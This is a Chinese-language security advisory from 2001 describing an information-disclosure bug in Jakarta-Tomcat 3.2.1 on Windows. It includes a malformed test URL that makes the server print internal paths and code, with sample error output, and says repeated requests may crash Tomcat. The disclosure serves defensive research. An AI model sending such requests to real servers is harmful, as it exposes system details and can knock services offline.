发布日期：2001-08-16
更新日期：2001-08-17

受影响系统：

Jakarta-Tomcat v3.2.1
  + Apache 1.3.19 (WinNT 4.0)

描述：

---

Tomcat在Windows 系统下的版本存在一个安全问题，如果输入特殊格式的URL，将导致
Tomcat报错，错误信息中可能包含很多系统信息，例如路径名等等。

<*来源：[LoWNOISE] Colombia (et@cyberspace.org) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

[LoWNOISE] Colombia (et@cyberspace.org)提供了如下测试代码：


http://host/\index.jsp

这将返回类似如下结果：

Error: 500
Location: /index.jsp
Internal Servlet Error:

org.apache.jasper.JasperException: Unable to compile class for JSP
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:482:
Method autenticate(java.lang.String) not found in class ENTERPRISE.login.
                if(pubBean.autenticate(password) != 0)
                                           ^
C:\tomcat\jakarta-tomcat-3.2.1\work\localhost_8080\_0002findex_0002ejspindex_jsp_69.java:664:
Method
Others methods...

如果重复提交上述代码，Tomcat可能崩溃。


建议：

---

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://jakarta.apache.org/tomcat/

浏览次数：3642
严重程度：0（网友投票）